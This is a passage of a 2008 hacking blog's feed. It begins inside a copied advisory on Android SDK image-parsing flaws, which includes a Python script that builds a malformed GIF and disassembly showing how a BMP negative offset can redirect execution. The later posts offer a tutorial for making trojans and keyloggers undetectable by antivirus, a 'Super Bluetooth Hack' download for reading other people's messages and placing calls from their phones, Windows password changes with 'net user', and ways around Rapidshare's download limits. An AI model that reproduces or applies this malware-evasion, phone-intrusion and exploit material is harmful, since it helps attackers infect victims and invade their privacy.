_good_ gif image&lt;br /&gt;imagename='overflow.gif'&lt;br /&gt;str = '\x00\x00\x00\x00'*30000&lt;br /&gt;im = Image.frombuffer('L',(len(str),1),str,'r&lt;wbr&gt;aw','L',0,1)&lt;br /&gt;im.save(imagename,'GIF')&lt;br /&gt;#Shrink the Logical screen dimension&lt;br /&gt;SWidth=1&lt;br /&gt;SHeight=1&lt;br /&gt;&lt;br /&gt;img = open(imagename,'rb').read()&lt;br /&gt;img = img[:6]+struct.pack('&lt;hh',swidth,sheight&lt;div class="para"&gt;&lt;wbr&gt;)+img[10:]&lt;br /&gt;&lt;br /&gt;#Save the _bad_ gif image&lt;br /&gt;q=open(imagename,'wb=""')&lt;br /&gt;q.write(img)&lt;br /&gt;q.close()&lt;br /&gt;- -----------/&lt;br /&gt;&lt;br /&gt;This security bug affects Android SDK m3-rc37a and earlier versions.&lt;br /&gt;Version m5-rc14 of the Android SDK includes a fix and is not vulnerable&lt;br /&gt;to this bug.&lt;br /&gt;&lt;br /&gt;#2 - PNG image parsing, multiple vulnerabilities:&lt;br /&gt;&lt;br /&gt;The Portable Network Graphics (PNG) is a bitmapped image format that&lt;br /&gt;employs lossless data compression [9]. PNG was created to improve upon&lt;br /&gt;and replace the GIF format as an image file format that does not require&lt;br /&gt;a patent license.&lt;br /&gt;&lt;br /&gt;The library 'libsgl.so' used by Android's WebKit contains commonly used&lt;br /&gt;code to load graphic files, as libpng, giflib and others. The version&lt;br /&gt;inside libsgl.so distributed with Android SDK m3-rc37a and earlier&lt;br /&gt;versions include the string '"libpng version 1.2.8 - December 3, 2004"'.&lt;br /&gt;Source code inspection of the file&lt;br /&gt;'\WebKitLib\WebKit\WebCore\platform\imag&lt;wbr&gt;e-decoders\png\png.c' included&lt;br /&gt;in the 'webkit-522-android-m3-rc20.tar.gz ' release of the Android&lt;br /&gt;project reveals that '"libpng version 1.2.7 - September&lt;br /&gt;12, 2004"' has been used in this release.&lt;br /&gt;&lt;br /&gt;This old version of libpng makes Android SDK m3-rc37a and earlier&lt;br /&gt;versions vulnerable to the following known issues: ' CVE-2006-5793,&lt;br /&gt;CVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268,&lt;br /&gt;CVE-2007-5269 '.&lt;br /&gt;Android version m5-rc14 has been updated to include libpng 1.2.24 and is&lt;br /&gt;likely not vulnerable.&lt;br /&gt;&lt;br /&gt;#3 - BMP image processing, negative offset integer overflow:&lt;br /&gt;&lt;br /&gt;The BMP file format, sometimes called bitmap or DIB file format (for&lt;br /&gt;device-independent bitmap), is an image file format used to store bitmap&lt;br /&gt;digital images, especially on Microsoft Windows and OS/2 operating&lt;br /&gt;systems [10].&lt;br /&gt;&lt;br /&gt;The integer overflow is caused when a Windows Bitmap file (.BMP) header&lt;br /&gt;is parsed in the method 'BMP::readFromStream(Stream *,&lt;br /&gt;ImageDecoder::Mode)' inside the 'libsgl.so' library. When the&lt;br /&gt;value of the 'offset' field of the BMP file header is negative and the&lt;br /&gt;Bitmap Information section (DIB header) specifies an image of 8 bits per&lt;br /&gt;pixel (8 bpp) the parser will try to allocate a palette, and will use&lt;br /&gt;the negative offset to calculate the size of the palette.&lt;br /&gt;&lt;br /&gt;The following code initializes the palette with the color white&lt;br /&gt;('0x00ffffff') but with a carefully chosen negative offset it can be&lt;br /&gt;made to overwrite any address of the process with that value. Because&lt;br /&gt;the BMP decoder source wasn't released, a disassembly of the binary&lt;br /&gt;included by Android is provided below:&lt;br /&gt;&lt;br /&gt;/-----------&lt;br /&gt;&lt;br /&gt;.text:0002EE38 MOV LR, R7 ; R7 is the negative offset&lt;br /&gt;.text:0002EE3C MOV R12, R7,LSL#2&lt;br /&gt;.text:0002EE40&lt;br /&gt;.text:0002EE40 loc_2EE40&lt;br /&gt;.text:0002EE40 LDR R3, [R10,#0x10]&lt;br /&gt;.text:0002EE44 ADD LR, LR, #1&lt;br /&gt;.text:0002EE48 MOVL R2, 0xFFFFFFFF&lt;br /&gt;.text:0002EE4C ADD R1, R12, R3 ; R3 is uninitialized (because of the&lt;br /&gt;same bug) but ranges 0x10000-0x20000&lt;br /&gt;.text:0002EE50 MOV R0, #0&lt;br /&gt;.text:0002EE54 CMP LR, R9&lt;br /&gt;.text:0002EE58 STRB R2, [R12,R3] ;Write 0x00ffffff to R12+13 (equals R1)&lt;br /&gt;.text:0002EE5C STRB R2, [R1,#2]&lt;br /&gt;.text:0002EE60 STRB R0, [R1,#3]&lt;br /&gt;.text:0002EE64 STRB R2, [R1,#1]&lt;br /&gt;.text:0002EE68 ADD R12, R12, #4&lt;br /&gt;.text:0002EE6C BNE loc_2EE40&lt;br /&gt;- -----------/&lt;br /&gt;&lt;br /&gt;Now, if let's take a look at the memory map of the Android browser:&lt;br /&gt;&lt;br /&gt;/-----------&lt;br /&gt;&lt;br /&gt;# ps&lt;br /&gt;ps&lt;br /&gt;USER PID PPID VSIZE RSS WCHAN PC NAME&lt;br /&gt;root 1 0 248 64 c0084edc 0000ae2c S /init&lt;br /&gt;root 2 0 0 0 c0049168 00000000 S kthreadd&lt;br /&gt;...&lt;br /&gt;root 1206 1165 16892 14564 c0084edc 00274af8 S ./gdb&lt;br /&gt;app_0 1574 535 83564 12832 ffffffff afe0c79c S&lt;br /&gt;com.google.android.browser&lt;br /&gt;root 1600 587 840 324 00000000 afe0bfbc R ps&lt;br /&gt;# cat /proc/1574/maps&lt;br /&gt;cat /proc/1574/maps&lt;br /&gt;00008000-0000a000 rwxp 00000000 1f:00 514 /system/bin/app_process&lt;br /&gt;0000a000-00c73000 rwxp 0000a000 00:00 0 [heap]&lt;br /&gt;08000000-08001000 rw-s 00000000 00:08 344 /dev/zero (deleted)&lt;br /&gt;...&lt;br /&gt;#&lt;br /&gt;- -----------/&lt;br /&gt;&lt;br /&gt;We can see that the heap is located in the range '0000a000-00c73000'&lt;br /&gt;and it is executable. Overwriting this area will allow to redirect&lt;br /&gt;execution flow if there is a virtual table stored in the heap. Later on&lt;br /&gt;the same method we can see that a call to the "Stream" Object VT is made:&lt;br /&gt;&lt;br /&gt;/-----------&lt;br /&gt;&lt;br /&gt;.text:0002EB64 LDR R12, [R8] # R8 is the "this" pointer of the Stream Object&lt;br /&gt;.text:0002EB68 MOV R0, R8&lt;br /&gt;.text:0002EB6C MOV LR, PC&lt;br /&gt;.text:0002EB70 LDR PC, [R12,#0x10] # A call is made to Stream+0x10&lt;br /&gt;- -----------/&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;  &lt;/div&gt;&lt;br /&gt;&lt;/div&gt; &lt;/div&gt; &lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-6320121169007531898?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/6320121169007531898/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=6320121169007531898' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/6320121169007531898'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/6320121169007531898'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/03/vulnerablities-in-google-android-sdk.html' title='Vulnerablities in GOOGLE ANDROID SDK'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-5715364940524902619</id><published>2008-03-08T06:19:00.000-08:00</published><updated>2008-03-22T04:58:31.936-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='virus coding'/><category scheme='http://www.blogger.com/atom/ns#' term='trojans'/><category scheme='http://www.blogger.com/atom/ns#' term='trojan builder'/><category scheme='http://www.blogger.com/atom/ns#' term='trojan coding'/><title type='text'></title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_eniK8-MS-uk/R9Kg2NUy1zI/AAAAAAAAABU/Sstjq2V37Ag/s1600-h/softwarepassportzh3.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://3.bp.blogspot.com/_eniK8-MS-uk/R9Kg2NUy1zI/AAAAAAAAABU/Sstjq2V37Ag/s320/softwarepassportzh3.jpg" alt="" id="BLOGGER_PHOTO_ID_5175375774952380210" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;This tutorial tells you how to make a Trojan, Virus, Keylogger, or anything that would be found harmful, NOT. This tutorial explains how to make all files look %100 clean (become clean and be %100 UNDETECTABLE from ALL ANTIVIRUSES!!!!! ALL!!!!!)Ready? GO! &lt;p&gt;First, get your trojan, virus or keylogger, or server or w/e you plan on using to become undetectable, and get it ready. Fix it up, create it, whatever.&lt;/p&gt; &lt;p&gt;My personal favorite&lt;br /&gt;keylogger: Ardamax Keylogger&lt;br /&gt;Remote Administration Tool (Must not have a router): Poisin Ivy&lt;br /&gt;Google is your friend.&lt;/p&gt; &lt;p&gt;Now that you have your trojan, virus or keylogger or w/e harmful ready, its time to make it UNDETECED!&lt;/p&gt; &lt;p&gt;1. Download Software Passport (Armadillo) by Silicon Realms. This is THE best binder out there I know of, it makes everything %100 UNDETECTABLE BY ALL ANTIVIRUSES (including&lt;a href="http://cracktohack.blogspot.com/search/label/How%20to%20make%20ALL%20Trojan%2FVirus%2FKeylogger%20UNDETECTABLE#" id="KonaLink1" target="_top" class="kLink"&gt;&lt;span style="color:blue;"&gt;&lt;span class="kLink" style="font-weight: 400; position: static;font-family:Verdana,sans-serif;font-size:12;color:#b00000;"   &gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; Norton, Kaspersky, Avast, etc)… The direct link to dl the program is here:&lt;br /&gt;Code:&lt;br /&gt;&lt;a href="http://www.w4ck1ng.com/board/link.php?url=http://nct.digitalriver.com/fulfill/0161.001" target="_blank"&gt;http://nct.digitalriver.com/fulfill/0161.001&lt;/a&gt;&lt;/p&gt; &lt;p&gt;There is a form to fill out information, so put in your real email address, and then you’ll recieve a download link in your email (it might be in Spam, Junk mail section so beware.)&lt;/p&gt; 2. Once you download the program, install it.&lt;br /&gt;3. Once installed, you open it up and see this:&lt;br /&gt;Code:&lt;br /&gt;&lt;a href="http://www.w4ck1ng.com/board/link.php?url=http://img339.imageshack.us/img339/6752/softwarepassportzh3.jpg" target="_blank"&gt;http://img339.imageshack.us/img339/6…assportzh3.jpg&lt;/a&gt; &lt;p&gt;This is the program. Now that you have it open, you might be confused on what the hell to do, right? Well, this is what you do!&lt;/p&gt; &lt;p&gt;1. Download this pre-made settings. These settings are pre-made by me so you won’t be confused. Everything is working.&lt;/p&gt; &lt;p&gt;DOWNLOAD THIS FOR THE PRE-MADE SETTINGS:&lt;br /&gt;Code:&lt;br /&gt;&lt;a href="http://www.w4ck1ng.com/board/link.php?url=http://rapidshare.com/files/8749860/projects.arm.html" target="_blank"&gt;http://rapidshare.com/files/8749860/projects.arm.html&lt;/a&gt;&lt;/p&gt; &lt;p&gt;DOWNLOAD THIS FOR THE BACKUP (You need this in the same location as the projects.arm file) YOU NEED THIS FILE ALSO!&lt;br /&gt;Code:&lt;br /&gt;&lt;a href="http://www.w4ck1ng.com/board/link.php?url=http://rapidshare.com/files/8750048/projects.Stats.html" target="_blank"&gt;http://rapidshare.com/files/8750048/projects.Stats.html&lt;/a&gt;&lt;/p&gt; &lt;p&gt;Now, when you download these files, and you put them in the SAME FOLDER (or same location), open Software Passport again and click Load Existing Project (top left).&lt;/p&gt; &lt;p&gt;Where it says “Files to Protect” (if theres stuff there, delete it):&lt;br /&gt;Add the files you want to make %100 UNDETECTABLE!!&lt;/p&gt; &lt;p&gt;Now, once done, go to the bottom right and click “Build Project”. A bunch of windows will come up, just click Yes and OK.&lt;/p&gt; &lt;p&gt;Now, once its created, they are %100 undetectable. Go to&lt;br /&gt;Code:&lt;br /&gt;virustotal.com&lt;br /&gt;to scan it with every Antivirus, and they wont find ANYTHING!&lt;/p&gt; &lt;p&gt;&lt;!-- / message --&gt;              &lt;!-- sig --&gt;&lt;/p&gt; &lt;div&gt; &lt;div class="hr" style="width: 100px;"&gt; &lt;hr /&gt;&lt;/div&gt; &lt;p&gt;„It takes a long time to learn simplicity.“&lt;/p&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-5715364940524902619?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/5715364940524902619/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=5715364940524902619' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/5715364940524902619'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/5715364940524902619'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/03/this-tutorial-tells-you-how-to-make.html' title=''/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_eniK8-MS-uk/R9Kg2NUy1zI/AAAAAAAAABU/Sstjq2V37Ag/s72-c/softwarepassportzh3.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-6976941843831117967</id><published>2008-03-08T06:18:00.001-08:00</published><updated>2008-03-22T05:00:08.660-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='xp password hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='windows password hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='windows hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='xp'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Change XP Passwords</title><content type='html'>&lt;p&gt;NOTE: This only works for XP home edition.&lt;/p&gt; &lt;p&gt;If you want to change a password on your computer all you have to do is follow these directions very carefully.&lt;/p&gt; &lt;p&gt;1.) Go to start.&lt;br /&gt;2.) Press “run”&lt;br /&gt;3.) Press “cmd”&lt;br /&gt;4.) After cmd.exe comes up, type  “net user” and press enter.&lt;br /&gt;5.) It will show all users on your computer. Pick the user from the list and type “net user (name of person)&lt;br /&gt;(and the new password you want.)”&lt;br /&gt;6.)Enter. It will say “The command completed successfully.”&lt;br /&gt;7.) Test it.&lt;/p&gt; &lt;p&gt;Good Luck!&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-6976941843831117967?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/6976941843831117967/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=6976941843831117967' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/6976941843831117967'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/6976941843831117967'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/03/change-xp-passwords.html' title='Change XP Passwords'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-7690872147831500494</id><published>2008-03-08T05:59:00.000-08:00</published><updated>2008-03-08T06:00:42.829-08:00</updated><title type='text'>Beat Rapidshare Download Limits and Waitin Times...!!</title><content type='html'>&lt;div class="entry"&gt; &lt;div class="snap_preview"&gt;&lt;h3&gt;Here are some hints to help you more efficently use rapidshare. Skipping waiting time and bypassing download limits are rapidshare hacks that everybody should know.&lt;/h3&gt; &lt;p&gt;From &lt;a href="http://www.jamzezwebsite.webs.com/" title="Jamzezwebsite" target="_blank"&gt;www.Jamzezwebsite.webs.com&lt;/a&gt;&lt;/p&gt; &lt;p&gt;Here are some methods for doing this:&lt;/p&gt; &lt;p&gt;&lt;span style="font-weight: bold;"&gt;1. Short-Out the JavaScript:&lt;/span&gt;&lt;/p&gt; &lt;ul&gt;1. Goto the page you want to download&lt;br /&gt;2. Select &lt;span style="font-weight: bold;"&gt;FREE&lt;/span&gt; button&lt;br /&gt;3. In the address bar put the following:  &lt;span style="font-weight: bold;"&gt;javascript:alert(c=0)&lt;/span&gt;&lt;br /&gt;4. Click &lt;span style="font-weight: bold;"&gt;OK&lt;/span&gt;&lt;br /&gt;5. Click &lt;span style="font-weight: bold;"&gt;OK&lt;/span&gt; to the pop-up box&lt;br /&gt;6. Enter the captcha&lt;br /&gt;7. Download Your File&lt;/ul&gt; &lt;p&gt;&lt;span style="font-weight: bold;"&gt;2. Request a new IP address from your ISP server.  &lt;/span&gt;&lt;/p&gt; &lt;ul&gt;Here’s how to do it in windows:&lt;br /&gt;1. Click &lt;span style="font-weight: bold;"&gt;Start&lt;/span&gt;&lt;br /&gt;2. Click &lt;span style="font-weight: bold;"&gt;run&lt;/span&gt;&lt;br /&gt;3. In the run box type &lt;span style="font-weight: bold;"&gt;cmd.exe &lt;/span&gt;and click &lt;span style="font-weight: bold;"&gt;OK&lt;/span&gt;&lt;br /&gt;4. When the command prompt opens type the following.  &lt;span style="font-weight: bold;"&gt;ENTER&lt;/span&gt; after each new line. &lt;div class="code"&gt;ipconfig /flushdns&lt;br /&gt;ipconfig /release&lt;br /&gt;ipconfig /renew&lt;br /&gt;exit&lt;/div&gt;&lt;p&gt;5. &lt;span style="font-weight: bold;"&gt;Erase your cookies &lt;/span&gt;in whatever browser you are using.&lt;br /&gt;6. Try the rapidshare download again.&lt;/p&gt;&lt;p&gt;Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. To be honest, I do not know how to do this in linux/unix/etc. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.&lt;/p&gt;&lt;/ul&gt; &lt;p&gt;&lt;span style="font-weight: bold;"&gt;3. Use a proxy with SwitchProxy and Firefox:&lt;/span&gt;&lt;/p&gt; &lt;ul&gt;1. &lt;a href="http://www.mozilla.org/products/firefox/" target="_blank" class="postlink"&gt;Download and install Firefox&lt;/a&gt; if you have not already&lt;br /&gt;2. &lt;a href="http://mozmonkey.com/switchproxy/" target="_blank" class="postlink"&gt;Download and install SwitchProxy&lt;/a&gt;&lt;br /&gt;3. &lt;a href="http://www.google.com/search?sourceid=navclient&amp;amp;ie=UTF-8&amp;amp;rls=GGLD,GGLD:2004-42,GGLD:en&amp;amp;q=proxy+lists" target="_blank" class="postlink"&gt;Google for free proxies&lt;/a&gt;&lt;br /&gt;4. When you hit your download limit, clean your cookies and change your proxy&lt;/ul&gt; &lt;p&gt;&lt;span style="font-weight: bold;"&gt;4. Use an anonymous service:&lt;/span&gt;&lt;/p&gt; &lt;ul&gt;Running your system through the &lt;a href="http://tor.eff.org/" target="_blank" class="postlink"&gt;tor&lt;/a&gt; network should in theory work; however, it is difficult to use and setup. Plus, you allow others to run their evil deeds through your system as well by using this system. &lt;a href="http://www.tkqlhce.com/c2111biroiq57CF767C5769E6988" target="_blank" class="postlink"&gt;Anonymizer 2005&lt;/a&gt; is inexpensive, easy to use, but not free. Other pay services would likely work as well.&lt;/ul&gt; &lt;p&gt;&lt;span style="font-weight: bold;"&gt;5. You can use a bookmarklet to stop your wait times:&lt;/span&gt;&lt;/p&gt; &lt;ul&gt;1. Open IE&lt;br /&gt;2. &lt;a href="http://hacktocrack.wordpress.com/page/3/var%20c=0;"&gt;Right Click On This Link&lt;/a&gt;&lt;br /&gt;3. Select &lt;span style="font-weight: bold;"&gt;Add to Favorites&lt;/span&gt;&lt;br /&gt;4. Select &lt;span style="font-weight: bold;"&gt;Yes&lt;/span&gt; to the warning that the bookmark may be unsafe.&lt;br /&gt;5. Name it “RapidShare No Wait”&lt;br /&gt;6. Click on the &lt;span style="font-weight: bold;"&gt;Links&lt;/span&gt; folder (if you want to display it in your IE toolbar)&lt;br /&gt;7. Click &lt;span style="font-weight: bold;"&gt;OK&lt;/span&gt;&lt;br /&gt;8. You may need to close and reopen IE to see it&lt;br /&gt;9. Goto rapidshare and click the bookmarklet when you are forced to wait&lt;/ul&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-7690872147831500494?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/7690872147831500494/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=7690872147831500494' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/7690872147831500494'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/7690872147831500494'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/03/beat-rapidshare-download-limits-and.html' title='Beat Rapidshare Download Limits and Waitin Times...!!'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-3069333343817713138</id><published>2008-03-08T05:52:00.001-08:00</published><updated>2008-03-08T05:59:16.704-08:00</updated><title type='text'>Super Bluetooth Hack - Now U All Can Do It..!!</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_eniK8-MS-uk/R9KbUtUy1yI/AAAAAAAAABM/3cswlIgzWKk/s1600-h/Super-Bluetooth-Hack.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://1.bp.blogspot.com/_eniK8-MS-uk/R9KbUtUy1yI/AAAAAAAAABM/3cswlIgzWKk/s320/Super-Bluetooth-Hack.gif" alt="" id="BLOGGER_PHOTO_ID_5175369701868623650" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;p&gt;With this java software you can connect to another mobile and ….&lt;/p&gt; &lt;p&gt;&lt;b&gt;Once connected to a another phone via bluetooth you can:&lt;/b&gt;&lt;br /&gt;- read his messages&lt;br /&gt;- read his contacts&lt;br /&gt;- change profile&lt;br /&gt;- play his ringtone even if phone is on silent&lt;br /&gt;- play his songs(in his phone)&lt;br /&gt;- restart the phone&lt;br /&gt;- switch off the phone&lt;br /&gt;- restore factory settings&lt;br /&gt;- change ringing volume&lt;br /&gt;- And here comes the best&lt;br /&gt;Call from his phone” it includes all call functions like hold etc.&lt;/p&gt; &lt;p&gt;&lt;b&gt;Notes:&lt;/b&gt;&lt;br /&gt;1.) When connecting devices use a code 0000&lt;br /&gt;2.) At start of programm on smartphones do not forget to turn on bluetooth before start of the mobile .&lt;/p&gt; &lt;p&gt;&lt;b&gt;Download:&lt;/b&gt; 111kb&lt;!--QuoteBegin--&gt;&lt;/p&gt; &lt;div class="quote"&gt;&lt;!--QuoteEBegin--&gt;http://rapidshare.com/files/69356389/SBH.v1.07.rar&lt;!--QuoteEnd--&gt;&lt;/div&gt; &lt;p&gt;&lt;!--QuoteEEnd--&gt;&lt;br /&gt;&lt;b&gt;Mirror1:&lt;/b&gt;&lt;br /&gt;&lt;!--QuoteBegin--&gt;&lt;/p&gt; &lt;div class="quote"&gt;&lt;!--QuoteEBegin--&gt;http://w13.easy-share.com/14502671.html&lt;!--QuoteEnd--&gt;&lt;/div&gt; &lt;p&gt;&lt;!--QuoteEEnd--&gt;&lt;br /&gt;&lt;b&gt;Mirror2:&lt;/b&gt;&lt;br /&gt;&lt;!--QuoteBegin--&gt;&lt;/p&gt; &lt;div class="quote"&gt;&lt;!--QuoteEBegin--&gt;http://www.megaupload.com/?d=R0SEV5PU&lt;/div&gt;  &lt;div&gt;&lt;b&gt;Mirror 3: &lt;/b&gt;&lt;/div&gt; &lt;p&gt;http://www.mediafire.com/?3wnbowtbmku&lt;/p&gt;  &lt;div&gt; &lt;b&gt;Pass:&lt;/b&gt; www.dl4all.com&lt;/div&gt; &lt;p&gt;&lt;!--QuoteEEnd--&gt;&lt;/p&gt;   &lt;p class="postmetadata"&gt;&lt;a href="http://hacktocrack.wordpress.com/2008/02/25/super-bluetooth-hack/#respond" title="Comment on Super Bluetooth Hack"&gt; Leave A Comment »&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-3069333343817713138?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/3069333343817713138/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=3069333343817713138' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/3069333343817713138'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/3069333343817713138'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/03/super-bluetooth-hack-now-u-all-can-do.html' title='Super Bluetooth Hack - Now U All Can Do It..!!'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_eniK8-MS-uk/R9KbUtUy1yI/AAAAAAAAABM/3cswlIgzWKk/s72-c/Super-Bluetooth-Hack.gif' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-2352886059502555048</id><published>2008-03-08T05:51:00.001-08:00</published><updated>2008-03-08T05:51:55.219-08:00</updated><title type='text'>Enable Right Click On Webs Dat Disabled It..!!</title><content type='html'>Lots of web sites have disabled the right click function of the mouse button… it’s really, really annoying.&lt;br /&gt;This is done so that you don’t steal (via right-click-&gt;save picture) their photos or images or any other goodies.&lt;br /&gt;Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.&lt;br /&gt;It’s easy to change, assuming your using IE 6:&lt;br /&gt;Click “Tools”-&gt;”Internet Options” Click the “Security” tab Click “Custom Level” Scroll down to the “Scripting” section Set “Active Scripting” to “disable” Click “Ok” a couple of times. You’ll probably want to turn this back to “enable” when your done… ’cause generally the javascript enhances a website&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-2352886059502555048?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/2352886059502555048/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=2352886059502555048' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/2352886059502555048'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/2352886059502555048'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/03/enable-right-click-on-webs-dat-disabled.html' title='Enable Right Click On Webs Dat Disabled It..!!'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-476964600982475340</id><published>2008-03-08T05:49:00.000-08:00</published><updated>2008-03-08T05:50:55.908-08:00</updated><title type='text'>Secret Backdoor To Many Websites</title><content type='html'>&lt;div class="entry"&gt; &lt;div class="snap_preview"&gt;&lt;p&gt;Ever experienced this? You ask Google to look something up; the engine 